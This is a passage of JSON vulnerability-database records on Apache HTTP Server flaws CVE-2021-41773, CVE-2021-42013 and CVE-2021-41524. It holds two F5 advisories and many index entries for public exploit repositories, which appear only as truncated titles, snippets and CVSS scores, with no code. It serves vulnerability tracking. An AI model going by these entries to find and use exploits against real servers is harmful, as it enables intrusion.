"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2022-02-10T00:00:00", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. ([CVE-2021-41773](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773>)) \n \nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions. 
([CVE-2021-42013](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T11:53:00", "type": "f5", "title": "Apache HTTP Server vulnerability CVE-2021-41773, CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T11:53:00", "id": "F5:K04082144", "href": "https://support.f5.com/csp/article/K04082144", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T00:00:00", "description": "While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. 
([CVE-2021-41524](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41524>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-05T06:12:00", "type": "f5", "title": "Apache HTTP server vulnerability CVE-2021-41524", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524"], "modified": "2021-11-05T06:12:00", "id": "F5:K56331254", "href": "https://support.f5.com/csp/article/K56331254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "githubexploit": [{"lastseen": "2022-03-04T01:18:36", "description": "# CVE-2021-41773\n\n## Usage\n\n```bash\ndocker-compose up --build vu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 
5.9}, "published": "2022-02-27T22:39:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-04T00:11:58", "id": "6CAA7558-723B-5286-9840-4DF4EB48E0AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773|CVE-2021-42013: Path Traversal Zero-Day in Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T14:58:27", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-07T19:19:39", "id": "A2D97DCC-04C2-5CB1-921F-709AA8D7FD9A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2021-41773 and CVE-2021-42013 Lab Setup\n\n## Setup \n```\n$ g...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-18T12:01:58", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-12-10T06:09:44", "id": "BF9B0898-784E-5B5E-9505-430B58C1E6B8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T20:00:41", "description": " and 2.4.5...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T17:56:25", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-27T21:52:34", "id": "0C28A0EC-7162-5D73-BEC9-B034F5392847", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-30T20:16:36", "description": "# CVE-2021-41773_CVE-2021-42013\nCVE-2021-41773 CVE-2021-42013\u591a\u7ebf\u7a0b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T03:32:18", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-30T12:49:14", "id": "B81BC21D-818E-5B33-96D7-062C14102874", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# cve-2021-41773 and cve-2021-42013\n\ncve-2021-41773 \u548c cve-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-09T11:33:56", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T06:48:47", "id": "D0368327-F989-5557-A5C6-0D9ACDB4E72F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": 
"2022-02-01T00:00:00", "description": "Apache HTTP Server\n\n What is it?\n -----------\n\n The Apache HT...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-12T22:02:09", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-21T12:52:18", "id": "88EB009A-EEFF-52B7-811D-A8A8C8DE8C81", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T20:32:50", "description": "# CVE-2021-42013\r\n\r\n## Description\r\n\r\nThis script exploits CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T21:48:40", 
"type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-23T16:46:10", "id": "C879EE66-6B75-5EC8-AA68-08693C6CCAD1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:30", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "0C47BCF2-EA6F-5613-A6E8-B707D64155DE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T05:34:23", "description": "### Exploit for CVE-2021-41773 and CVE-2021-42013\n**Path travers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-04T22:07:21", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-04-05T05:17:33", "id": "A8616E5E-04F8-56D8-ACB4-32FDF7F66EED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# apache httpd path traversal checker\n\n\n## 0x00 \u6982\u8ff0\n\n20211005\uff0c\u7f51\u4e0a\u66dd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T10:38:44", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-31T07:15:01", "id": "1C39E10A-4A38-5228-8334-2A5F8AAB7FC3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:27:46", "description": "## \u6f0f\u6d1e\u540d\u79f0\n\nApache \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c \uff08CVE-2021-42013\uff09\n\n## \u6f0f\u6d1e\u63cf\u8ff0\n\nApache HTTP Se...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-23T14:46:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-08T16:14:48", "id": "78787F63-0356-51EC-B32A-B9BD114431C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:10:15", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "F8A7DE57-8F14-5B3C-A102-D546BDD8D2B8", "href": "", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T05:28:59", "description": "# CVE-2021-42013\n\nThis is the deployment for Apache 2.4.50 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T04:08:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2022-03-14T04:20:42", "id": "495E99E5-C1B0-52C1-9218-384D04161BE4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-19T12:14:33", "description": "# CVE-2021-41773\n\nThis is the deployment for Apache 2.4.49 which...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T05:13:17", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-01-05T08:44:20", "id": "E59A01BE-8176-5F5E-BD32-D30B009CDBDA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:12:43", "description": "# CVE-2021-42013\n## Introduction\nIt was found that the fix for C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-14T18:00:48", "type": "githubexploit", "title": "Exploit for Path Traversal in Apache Http Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-03-14T01:22:13", "id": "F41EE867-4E63-5259-9DF0-745881884D04", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-14T03:15:08", "description": "# CVE-2021-41773\n- [CVE-2021-41773: Path Traversal Zero-Day in A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T11:55:10", "type": 